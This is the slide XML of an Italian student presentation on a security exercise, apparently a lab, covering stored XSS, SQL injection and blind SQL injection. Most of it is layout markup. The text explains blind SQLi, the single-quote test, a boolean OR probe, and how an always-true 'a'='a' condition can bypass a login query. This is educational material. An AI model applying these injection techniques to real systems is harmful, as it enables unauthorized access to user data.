            <a:xfrm rot="5423755">
              <a:off x="8927951" y="1156"/>
              <a:ext cx="335808" cy="335808"/>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name="AutoShape 33" id="33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="true">
            <a:off x="1123977" y="5199897"/>
            <a:ext cx="13580665" cy="9525"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="flat" w="38100">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" len="sm" w="sm"/>
            <a:tailEnd type="none" len="sm" w="sm"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 34" id="34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="8146398" y="1028700"/>
            <a:ext cx="3120020" cy="2987419"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2987419" w="3120020">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3120020" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3120020" y="2987419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2987419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 35" id="35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="-766366" y="7764591"/>
            <a:ext cx="3120020" cy="2987419"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2987419" w="3120020">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3120020" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3120020" y="2987418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2987418"/>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77280"/>
            <a:ext cx="6146083" cy="4038183"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8194777" cy="5384243"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 3" id="3"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="-9525"/>
              <a:ext cx="7359120" cy="2549525"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="7519"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="6266">
                  <a:solidFill>
                    <a:srgbClr val="CB6CE6"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed"/>
                </a:rPr>
                <a:t>1.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="6266">
                  <a:solidFill>
                    <a:srgbClr val="CB6CE6"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed Ultra-Bold"/>
                </a:rPr>
                <a:t> SQL Injection</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="6266">
                  <a:solidFill>
                    <a:srgbClr val="FFDE59"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed Ultra-Bold"/>
                </a:rPr>
                <a:t> (Blind)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 4" id="4"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="3717587"/>
              <a:ext cx="8194777" cy="1069764"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="3289"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="3289"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="8898314" y="-3975510"/>
            <a:ext cx="17526836" cy="16781945"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="16781945" w="17526836">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17526835" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17526835" y="16781945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="16781945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 6" id="6"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1376878" y="2817347"/>
            <a:ext cx="5449727" cy="6701790"/>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Roboto Condensed"/>
              </a:rPr>
              <a:t>Il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFDE59"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>Blind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Injection è usato quando un'applicazione web è vulnerabile ad SQLI ma i risultati dell'operazione non sono visibili all'attaccante. La pagina con la vulnerabilità potrebbe non essere una che mostra dei dati, ma può essere visualizzata differentemente a seconda del risultato dello statement di tipo logico iniettato dentro lo statement SQL originale, chiamato per quella pagina. Questo tipo di attacco può impiegare un notevole dispendio di tempo perché bisogna creare un nuovo statement per ogni bit recuperato. Ci sono vari strumenti che permettono di automatizzare questi attacchi una volta che sono state individuate le vulnerabilità e qual è l'informazione obiettivo.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8854993"/>
            <a:ext cx="17526836" cy="16781945"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="16781945" w="17526836">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17526836" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17526836" y="16781945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="16781945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 3" id="3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="5563719" y="5668993"/>
            <a:ext cx="8214871" cy="3869009"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3869009" w="8214871">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8214871" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8214871" y="3869009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3869009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 4" id="4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1028700" y="377280"/>
            <a:ext cx="6146083" cy="4038183"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8194777" cy="5384243"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 5" id="5"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="-9525"/>
              <a:ext cx="7359120" cy="2549525"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="7519"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="6266">
                  <a:solidFill>
                    <a:srgbClr val="CB6CE6"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed"/>
                </a:rPr>
                <a:t>2.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="6266">
                  <a:solidFill>
                    <a:srgbClr val="CB6CE6"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed Ultra-Bold"/>
                </a:rPr>
                <a:t> Pagina SQL Injection </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="6266">
                  <a:solidFill>
                    <a:srgbClr val="FFDE59"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed Ultra-Bold"/>
                </a:rPr>
                <a:t>(Blind)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 6" id="6"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="3717587"/>
              <a:ext cx="8194777" cy="1069764"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="3289"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="3289"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 7" id="7"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1028700" y="2818775"/>
            <a:ext cx="8634249" cy="2091690"/>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Roboto Condensed"/>
              </a:rPr>
              <a:t>Nella Pagina principale della SQL Injection (Blind) proviamo ad inserire il carattere “ ‘ “ per verificare se il database  risponde con un errore ma, sapendo che sul Database di</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t> SQL Injection Blind non abbiamo risposta in caso di errore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>, il form rimane cieco.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59441" y="4078530"/>
            <a:ext cx="6146083" cy="816611"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3289"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3289"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 3" id="3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="11961021" y="-4907675"/>
            <a:ext cx="17526836" cy="16781945"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="16781945" w="17526836">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17526836" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17526836" y="16781945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="16781945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 4" id="4"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2775491" y="5673046"/>
            <a:ext cx="5096026" cy="16725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Abbiamo provato ad inserire  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>la variabile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>booleana OR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>per effettuare una verifica</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>sulle eventuali risposte sempre vere del Database.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 5" id="5"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1340141" y="2179078"/>
            <a:ext cx="4298445" cy="167259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Roboto Condensed"/>
              </a:rPr>
              <a:t>Uno dei tipi di blind SQL injection forza il database a valutare uno statement logico su un'ordinaria schermata dell'applicazione. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 6" id="6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="8640961" y="2104681"/>
            <a:ext cx="5250224" cy="4911123"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4911123" w="5250224">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5250224" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5250224" y="4911123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4911123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 7" id="7"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1481436" y="8180860"/>
            <a:ext cx="13899216" cy="12534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Roboto Condensed"/>
              </a:rPr>
              <a:t>Se questo codice fosse utilizzato in una procedura di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:hlinkClick r:id="rId4" tooltip="https://it.wikipedia.org/wiki/Autenticazione"/>
              </a:rPr>
              <a:t>autenticazione</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>, allora questo esempio potrebbe essere usato per forzare la selezione di tutti i campi dati (*) di "tutti" gli utenti piuttosto che di un singolo username come era inteso dal codice, ciò accade perché la valutazione di</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t> ‘a'='a' è sempre vera (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
                <a:hlinkClick r:id="rId5" tooltip="https://it.wikipedia.org/w/index.php?title=Short-circuit_evaluation&amp;action=edit&amp;redlink=1"/>
              </a:rPr>
              <a:t>short-circuit evaluation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condense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21391" y="3395524"/>
            <a:ext cx="7822609" cy="3084470"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="10430145" cy="4112626"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 3" id="3"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="-9525"/>
              <a:ext cx="10430145" cy="1278871"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="7525"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="6271">
                  <a:solidFill>
                    <a:srgbClr val="CB6CE6"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed Ultra-Bold"/>
                </a:rPr>
                <a:t>Traccia</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 4" id="4"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="1647182"/>
              <a:ext cx="10430145" cy="2465444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="3738"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2670">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed Ultra-Bold"/>
                </a:rPr>
                <a:t> Nell’esercizio di oggi, viene richiesto di exploitare le vulnerabilità: </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="3738"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2670">
                  <a:solidFill>
                    <a:srgbClr val="CB6CE6"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed Ultra-Bold"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" marL="0" indent="0" lvl="0">
                <a:lnSpc>
                  <a:spcPts val="3738"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 5" id="5"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1899082" y="5617965"/>
            <a:ext cx="7882467" cy="3004185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="4800"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="518160" indent="-259080" lvl="1">
              <a:lnSpc>
                <a:spcPts val="4800"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> XSS stored. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="518160" indent="-259080" lvl="1">
              <a:lnSpc>
                <a:spcPts val="4800"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> SQL injection. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="518160" indent="-259080" lvl="1">
              <a:lnSpc>
                <a:spcPts val="4800"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> SQL injection blind ( Bonus Track)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="4800"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 6" id="6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="2189548">
            <a:off x="-5754238" y="-1389036"/>
            <a:ext cx="19961764" cy="19113389"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="19113389" w="19961764">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19961764" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19961764" y="19113389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="19113389"/>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910486" y="-16031832"/>
            <a:ext cx="27919356" cy="18885934"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="37225808" cy="25181245"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 3" id="3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="-5628874">
              <a:off x="14818332" y="2806147"/>
              <a:ext cx="22164701" cy="21222701"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="21222701" w="22164701">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="22164700" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22164700" y="21222701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="21222701"/>
